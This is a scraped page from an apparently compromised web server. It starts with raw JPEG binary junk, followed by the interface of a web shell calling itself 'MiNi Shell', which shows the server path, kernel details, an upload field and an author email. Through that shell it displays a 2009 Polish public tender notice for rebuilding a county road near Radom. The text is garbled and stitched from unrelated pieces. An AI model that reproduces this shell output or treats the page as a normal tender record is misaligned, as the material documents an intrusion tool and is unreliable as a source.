JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/80273-N-2009.html

<p class="kh_header"><b>Radom: Przebudowa drogi  powiatowej nr 3509 W Gulin - Wsola - Wojciechów 
      od drogi krajowej nr 7 do miejscowości Wojciechów</b><br>
<b>Numer ogłoszenia: 80273 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg Publicznych w Radomiu , ul. Graniczna 24, 26-600 Radom, woj. mazowieckie, tel. 048 3655801 w. 231.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> radompowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi  powiatowej nr 3509 W Gulin - Wsola - Wojciechów 
      od drogi krajowej nr 7 do miejscowości Wojciechów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych oznaczonych nazwą Przebudowa drogi powiatowej nr 3509 W Gulin - Wsola - Wojciechów od drogi krajowej nr 7 do miejscowości Wojciechów na odcinku długości 6659,49 m od km 8+688 do km 12+908,35 i od km 13+783,87 do km 16+223,01.
   W  ramach  robót   należy wykonać:
               - roboty przygotowawcze (obsługa geodezyjna, mechaniczne ścinanie drzew z 
                   karczowaniem pni, mechaniczne rozebranie nawierzchni z betonu i kostki brukowej, 
                   rozebranie: murków betonowych, nawierzchni z płyt drogowych betonowych i płyt typu 
                   EKO, przepustów rurowych, obrzeży trawnikowych, krawężników betonowych oraz 
                   oczyszczenie przepustów),
               - roboty ziemne (renowacja rowów, wykonanie koryta pod poszerzenia istniejącej 
                  nawierzchni, zasypaniem przepustów na zjazdach),
               - podbudowę,
               - warstwę wyrównawczą i ścieralną z mieszanek mineralno-asfaltowych,
               - odwodnienie (ścieki przykrawędziowe typu przykanalik okrągły)
               - chodnik, zjazdy i pobocza,
               - roboty wykończeniowe (regulacja pionowa studzienek: dla studzienek telefonicznych, 
                  dla zaworów wodociągowych i gazowych oraz remonty cząstkowe krawędzi istniejącej 
                   nawierzchni),
               - oznakowanie pionowe, poziome oraz bariery i poręcze ochronne .

 W/w roboty drogowe należy wykonać zgodnie z :
1.	Dokumentacją projektową przebudowy drogi powiatowej Nr 3509 W (34406)
       Gulin - Wsola - Wojciechów na odcinku długości 6659,49 m od km 8+688 do km   
       12+908,35 i od km 13+783,87 do km 16+223,01.
2. Szczegółowymi  specyfikacjami  technicznymi.
       3. Przedmiarem robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium: 
1. Wykonawca przystępując do przetargu jest zobowiązany wnieść wadium w wysokości 
         - 30.000,0 zł   (słownie: trzydzieści tysięcy złotych ).
2. Wadium należy wnieść na okres związania ofertą tj. od 15.06.2009r. do 14.07.2009r., w terminie 
        do  dnia 15.06.2009 r. do godz. 1100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.      Warunki ogólne .
           O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy 
           1.1 Spełniają warunki określone w   art. 22 ust. 1 Ustawy Prawo zamówień publicznych 
                     ( jednolity tekst z 2007 r. Dz. U. Nr 223, poz. 1655 z późn. zm.),
            1.2  Nie podlegają wykluczeniu z postępowania na podstawie   art. 24 ust. 1 i ust. 2 w/w 
                       Ustawy;
2.     Warunki szczegółowe:
2.1. Wykonawca musi wykazać, że:
a) dysponuje między innymi kadrą posiadającą uprawnienia budowlane bez ograniczeń (wymagane przez Prawo budowlane) do pełnienia samodzielnych funkcji w zakresie kierowania i nadzorowania robót w  specjalności drogowej  min.  1 osoba,
b) dysponuje niżej podanymi, w pełni sprawnymi i spełniającymi wymagania specyfikacji technicznej, jednostkami podstawowych narzędzi, urządzeń i sprzętu:

1.	Wytwórnia mas bitumicznych o wydajności co najmniej 100 Mg/h	1 szt
2.	Układarka mas bitumicznych sterowana elektronicznie 
o szerokości układania  co najmniej 5,5 metrów	1 szt.
3.	Skrapiarka	1 szt
4.	Koparka	1 szt
5.	Walec stalowy gładki	1 szt.
6.	 Walec ogumiony	1 szt.
7	Laboratorium wyposażone co najmniej w sprzęt do wykonania następujących badań: 
-	zagęszczenia, 
-	wytrzymałości na ściskanie,
-	składu, stabilności i odkształcenia,
-    zagęszczenia mieszanek mineralno-asfaltowych.	1 komplet

Wykonawca może także wymienić alternatywne porównywalne technicznie narzędzia 
i urządzenia proponowane przez siebie dla danych robót, dołączając uzasadnienie swoich propozycji.
                   c) dysponuje własnymi środkami finansowymi ( dopuszczalne jest tu  wykazanie środków
                         kredytu obrotowego  lub innego o ile środki te nie są przeznaczone na zrealizowanie 
                         konkretnego celu) lub zdolnością kredytową w wysokości nie mniejszej niż  400 tyś zł. 
                        ( słownie: czterysta tysięcy złotych ),
d) zrealizował w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego 
    postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co 
    najmniej  jedną robotę drogową w zakres której wchodziło wykonanie między innymi:    
    chodników/nawierzchni z kostki brukowej, nawierzchni mineralno-asfaltowych o  
    wartości co najmniej  1.000.000,- PLN).
  Wykonane roboty należy  potwierdzić referencjami/ opinią Zamawiającego, iż zostały 
   wykonane należycie. 
                   UWAGA!
Zaleca się, aby przedstawione referencje/ opinie zawierały charakterystykę  wykonanych robót oraz ich  wartość.


3. Sposób spełniania warunków w przypadku złożenia oferty przez podmioty występujące wspólnie ( spółki cywilne/konsorcja) 
3.1. W przypadku Wykonawców występujących wspólnie wymagania określone w pkt 1. z wyjątkiem przesłanek wymienionych w art. 24 ust. 1 pkt 10 i ust. 2 pkt 3 i 4 ustawy Pzp muszą być spełnione przez każdego z Wykonawców oferty wspólnej.
Wymagania wymienione w art. 24 ust. 1 pkt 10 i ust. 2 pkt 3 i 4 ustawy Pzp oraz określone w pkt  2. muszą  być spełnione łącznie.
4. Opis sposobu dokonywania oceny spełniania warunków
4.1. Potwierdzenie spełniania warunków, o których mowa w pkt. 1. i 2. nastąpi w oparciu 
o dokumenty i oświadczenia wymagane w specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania. 
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.
Wykonawca, który nie spełni chociażby jednego wymaganego od niego warunku zostanie wykluczony z postępowania przetargowego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Dla potwierdzenia spełniania warunków ogólnych określonych w pkt 1.  Wykonawcy winni przedłożyć niżej wymienione dokumenty i oświadczenia:
 1.1. Oświadczenie, że Wykonawca spełnia wymagania art. 22 ust. 1 ustawy Pzp oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8  ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy podmiotów zbiorowych).
1.5. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. Dla potwierdzenia spełnienia warunków szczegółowych określonych w pkt 2.  Wykonawcy winni przedłożyć niżej wymienione dokumenty i oświadczenia: 
2.1. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z uprawnieniami budowlanymi i dokumentami potwierdzającymi przynależność do Krajowej Izby Inżynierów Budownictwa 
2.2. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt  2.1. Wykonawca wskazał osoby, którymi będzie dysponował.
           
            2.3. Wykaz narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca.
2.4   Informację z banku, w którym Wykonawca posiada podstawowy rachunek bankowy, 
                      potwierdzającą  wysokość posiadanych środków finansowych  lub zdolność kredytową  
                     Wykonawcy, wystawioną nie wcześniej niż  3 miesiące przed upływem terminu składania 
                     ofert.
2.5. Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt 2.3. Wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
2.6. Wykaz ważniejszych robót drogowych wraz z referencjami - opiniami zamawiających.
3.	   W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
             a)  oświadczenie wymienione w pkt  1.1. oraz zobowiązanie wymienione w pkt 2.2. i w 
                  pkt   2.5. powinien przedłożyć w imieniu wszystkich Wykonawców ustanowiony 
                  pełnomocnik(lider).
             b) dokumenty wymienione w pkt 1.2., 1.3., 1.4., 1.5. powinny być złożone przez 
                każdego  Wykonawcę (uczestnika oferty wspólnej). 
             c) dokumenty i oświadczenia wymienione w pkt  2.1.,   2.3.,  2.4., 2.6 powinien złożyć  
                 ten Wykonawca, który w całości spełnia postawione warunki, lub ci Wykonawcy którzy
                 spełniają  poszczególne  warunki.
4.	Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika (lidera) do 
        reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w 
        sprawie zamówienia publicznego.
        Wszelkie rozliczenia dotyczące realizowanego zamówienia będą dokonywane wyłącznie 
         z pełnomocnikiem (liderem).
5. Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
       Polskiej, zamiast dokumentów, o których mowa w pkt. od 1.2 do 1.5 - składa dokument lub 
       dokumenty wystawione w kraju, w którym ma on siedzibę lub miejsce zamieszkania, 
        potwierdzające  odpowiednio, że:
     a) nie otwarto likwidacji ani nie ogłoszono upadłości,
     b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
     c) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, 
        albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości lub części wykonania decyzji właściwego organu;
Jeżeli w kraju pochodzenia osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów o których mowa powyżej, zastępuje się je  dokumentem zawierającym oświadczenie złożone przed notariuszem , właściwym organem sądowym, administracyjnym albo organem samorządu  zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

Dokumenty o których mowa w pkt. 5. powinny być wystawione nie wcześniej  niż odpowiadające im  dokumenty określone w pkt. 1.2;  1.3 ; 1.4 i 1.5.
6. Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawcę warunków  
       mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z 
       oryginałem przez Wykonawcę. Komisja zastrzega sobie prawo zażądania od Wykonawcy, 
       przedłożenia Komisji do wglądu, oryginałów wymienionych dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://eurzad.spradom.finn.pl/serwis/przetargi.jsp.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg Publicznych w Radomiu
ul. Graniczna 24
26-600 Radom
pok. 104.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 11:00, miejsce: Powiatowy Zarząd Dróg Publicznych w Radomiu
ul. Graniczna 24
26-600 Radom
pok. 104.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com